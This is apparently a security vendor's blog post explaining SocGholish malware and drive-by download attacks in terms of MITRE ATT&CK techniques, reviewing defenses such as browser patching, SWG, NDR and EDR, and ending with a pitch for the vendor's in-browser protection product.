SocGholish—a family of malware that has been active since at least 2018 and is associated with the Russia-based threat actor EvilCorp—is frequently used for initial access. This malware family was ranked #6 on Red Canary’s Top 10 real-world threats in their 2023 Threat Detection Report. What makes SocGholish infections so devious is that they are often the result of a drive-by download: a class of attacks capable of installing malware without users’ knowledge or consent. These attacks occur when a user visits a compromised website containing hidden malicious code or links and are often used to target specific populations (e.g., employees of governments or critical infrastructure companies).
Anatomy of drive-by download attacks
Drive-by downloads—or, as MITRE ATT&CK® identifies them, Drive-By Compromise[s] (
T1189)—are particularly problematic because they can leverage both the normal behavior of browsers and
weaknesses in browser security to deliver malware while easily evading detection.
One combination of techniques that often accompany or support such attacks are Obfuscated Files or Information (T1027) and Deobfuscat[ion] and Decod[ing] Files or Information (T1140) and a very common method of obfuscating and decoding the malicious files is the use of base64 which converts binary data into ASCII text. By using base64 encoding/ decoding, payloads are easier to transmit over Internet and much less likely to be detected by anti-malware products, since they appear to be strings of plain text. This delivery method can be a precursor to either Reflective Code Loading (T1620) for file-less attacks or User Execution: Malicious File (T1204.002). SocGholish in particular has also been known employ the Command and Scripting Interpreter (T1059) on the local system (e.g.,wscript.exe on Windows) or the script execution of capabilities of web browsers to execute JavaScript (T1059.007).
Another technique that adversaries may employ is the use of redirects, which automatically forward users from one website to another. By using redirects, they are able to transparently shift users from a benign website to a malicious one without their consent. They may also obfuscate or encode the redirects to make it harder for users to identify.
The damage
Drive-by download attacks can cause significant damage to a user’s device, as well as compromising both corporate and personal information. Moreover, users may not be aware until it’s too late. Once attackers have gained their initial foothold they can use their position to steal users’ session cookies (to access other services), begin conducting reconnaissance and moving laterally, or download second-stage payloads like ransomware.
What to do
As with everything in cybersecurity, it is necessary—
but not sufficient—to keep browsers updated with the latest security patches to make it harder to exploit vulnerabilities with drive-by downloads. User awareness training is also important but may ultimately be ineffective, given the ways in attackers conceal their actions. Inline security tools such as Secure Web Gateways (SWG) and Network Detection and Response (NDR) may be fooled by the evasiveness of these attacks. Endpoint Detection and Response (EDR) tools may be able to detect them, but the initial compromise may already have occurred and organizations may find themselves in an incident response (IR) or recovery scenario, rather than having prevented the attack outright.
Seraphic Security prevents browser exploitation and can block other forms of web-based attacks with unique Prevention and Detection Engines that operate directly in the browser and can reduce the threat of drive-by downloads. To learn more, visit our Safe Browsing Use-case page, our Product page, or request a demo.
